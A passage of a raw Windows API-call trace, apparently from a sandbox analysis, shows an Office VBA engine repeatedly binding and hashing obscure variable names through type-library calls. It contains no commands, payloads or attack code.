pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.026] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0070.026] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb27ba | out: _Dst=0x68767a0) returned 0x0 [0070.026] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YAQ_wUX") returned 0x101f41 [0070.026] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_YAQ_wUX" | out: _Dst="_B_var_YAQ_wUX") returned 0x0 [0070.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_YAQ_wUX") returned 15 [0070.026] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.026] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YAQ_wUX", lHashVal=0x101f41, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.026] IUnknown:Release (This=0x665ba50) returned 0xf [0070.026] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.026] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YAQ_wUX", lHashVal=0x101f41, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.026] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.026] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.026] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YAQ_wUX", lHashVal=0x101f41, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.026] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.026] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.026] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YAQ_wUX", lHashVal=0x101f41, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.026] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.026] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.026] IUnknown:Release (This=0x665ba50) returned 0xf [0070.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1cfe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_YAQ_wUX") returned 15 [0070.026] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YAQ_wUX", lHashVal=0x101f41, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x77005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x77005f00000000, pDummy=0x0) returned 0x0 [0070.027] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb27ba | out: _Dst=0x144ec0) returned 0x0 [0070.027] ITypeComp:RemoteBind (in: This=0x665ba60, szName="RADQCZ", lHashVal=0x107f15, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb280a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="RADQCZ") returned 7 [0070.027] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="RADQCZ", lHashVal=0x107f15, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb280a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="RADQCZ") returned 7 [0070.027] ITypeComp:RemoteBind (in: This=0x665bd30, szName="RADQCZ", lHashVal=0x107f15, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RADQCZ") returned 0x107f15 [0070.027] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="RADQCZ" | out: _Dst="RADQCZ") returned 0x0 [0070.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="RADQCZ") returned 7 [0070.027] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.027] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="RADQCZ", lHashVal=0x107f15, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.027] IUnknown:Release (This=0x665ba50) returned 0xf [0070.027] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.027] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="RADQCZ", lHashVal=0x107f15, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.027] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.027] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.027] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="RADQCZ", lHashVal=0x107f15, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.027] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.027] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.027] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="RADQCZ", lHashVal=0x107f15, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.027] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb280a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="RADQCZ") returned 7 [0070.027] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="RADQCZ", lHashVal=0x107f15, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.028] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0070.028] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3cb280a | out: _Dst=0x68767a0) returned 0x0 [0070.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_RADQCZ") returned 0x10f9be [0070.028] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_RADQCZ" | out: _Dst="_B_var_RADQCZ") returned 0x0 [0070.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_RADQCZ") returned 14 [0070.028] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.028] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_RADQCZ", lHashVal=0x10f9be, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.028] IUnknown:Release (This=0x665ba50) returned 0xf [0070.028] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.028] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_RADQCZ", lHashVal=0x10f9be, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.028] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.028] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.028] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_RADQCZ", lHashVal=0x10f9be, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.028] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.028] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.028] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_RADQCZ", lHashVal=0x10f9be, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.028] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.028] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.028] IUnknown:Release (This=0x665ba50) returned 0xf [0070.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1d2e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_RADQCZ") returned 14 [0070.028] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_RADQCZ", lHashVal=0x10f9be, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0) returned 0x0 [0070.028] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb280a | out: _Dst=0x144ec0) returned 0x0 [0070.028] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XAAABAA", lHashVal=0x102c2a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb27e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XAAABAA") returned 8 [0070.029] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XAAABAA", lHashVal=0x102c2a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb27e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XAAABAA") returned 8 [0070.029] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XAAABAA", lHashVal=0x102c2a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XAAABAA") returned 0x102c2a [0070.029] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="XAAABAA" | out: _Dst="XAAABAA") returned 0x0 [0070.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="XAAABAA") returned 8 [0070.029] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.029] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="XAAABAA", lHashVal=0x102c2a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.029] IUnknown:Release (This=0x665ba50) returned 0xf [0070.029] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.029] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="XAAABAA", lHashVal=0x102c2a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.029] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.029] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.029] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="XAAABAA", lHashVal=0x102c2a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.029] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.029] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.029] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="XAAABAA", lHashVal=0x102c2a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.029] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb27e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="XAAABAA") returned 8 [0070.029] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XAAABAA", lHashVal=0x102c2a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.029] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0070.029] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb27e2 | out: _Dst=0x68767a0) returned 0x0 [0070.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_XAAABAA") returned 0x102fae [0070.030] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_XAAABAA" | out: _Dst="_B_var_XAAABAA") returned 0x0 [0070.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_XAAABAA") returned 15 [0070.030] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.030] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_XAAABAA", lHashVal=0x102fae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.030] IUnknown:Release (This=0x665ba50) returned 0xf [0070.030] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.030] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_XAAABAA", lHashVal=0x102fae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.030] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.030] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.030] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_XAAABAA", lHashVal=0x102fae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.030] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.030] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.030] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_XAAABAA", lHashVal=0x102fae, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.030] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.030] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.030] IUnknown:Release (This=0x665ba50) returned 0xf [0070.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1d5e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_XAAABAA") returned 15 [0070.030] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XAAABAA", lHashVal=0x102fae, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0070.030] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb27e2 | out: _Dst=0x144ec0) returned 0x0 [0070.030] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iUQAAkA", lHashVal=0x10679c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb285e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iUQAAkA") returned 8 [0070.030] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iUQAAkA", lHashVal=0x10679c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb285e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iUQAAkA") returned 8 [0070.032] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iUQAAkA", lHashVal=0x10679c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.032] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iUQAAkA") returned 0x10679c [0070.032] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="iUQAAkA" | out: _Dst="iUQAAkA") returned 0x0 [0070.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="iUQAAkA") returned 8 [0070.032] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.032] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iUQAAkA", lHashVal=0x10679c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.032] IUnknown:Release (This=0x665ba50) returned 0xf [0070.033] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.033] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iUQAAkA", lHashVal=0x10679c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.033] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.033] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.033] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iUQAAkA", lHashVal=0x10679c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.033] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.033] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.033] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iUQAAkA", lHashVal=0x10679c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.033] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb285e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iUQAAkA") returned 8 [0070.033] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iUQAAkA", lHashVal=0x10679c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.033] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d20 [0070.033] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb285e | out: _Dst=0x67c2d20) returned 0x0 [0070.033] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iUQAAkA") returned 0x105b9f [0070.033] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_iUQAAkA" | out: _Dst="_B_var_iUQAAkA") returned 0x0 [0070.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_iUQAAkA") returned 15 [0070.033] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.033] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iUQAAkA", lHashVal=0x105b9f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.033] IUnknown:Release (This=0x665ba50) returned 0xf [0070.033] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.033] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iUQAAkA", lHashVal=0x105b9f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.033] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.033] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.034] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iUQAAkA", lHashVal=0x105b9f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.034] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.034] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.034] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iUQAAkA", lHashVal=0x105b9f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.034] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.034] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.034] IUnknown:Release (This=0x665ba50) returned 0xf [0070.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1d8e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_iUQAAkA") returned 15 [0070.034] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iUQAAkA", lHashVal=0x105b9f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0070.034] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb285e | out: _Dst=0x144ec0) returned 0x0 [0070.034] ITypeComp:RemoteBind (in: This=0x665ba60, szName="OAAAUAB", lHashVal=0x105bb0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2886, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OAAAUAB") returned 8 [0070.034] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="OAAAUAB", lHashVal=0x105bb0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2886, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OAAAUAB") returned 8 [0070.034] ITypeComp:RemoteBind (in: This=0x665bd30, szName="OAAAUAB", lHashVal=0x105bb0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.034] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAAAUAB") returned 0x105bb0 [0070.034] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="OAAAUAB" | out: _Dst="OAAAUAB") returned 0x0 [0070.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="OAAAUAB") returned 8 [0070.034] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.034] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="OAAAUAB", 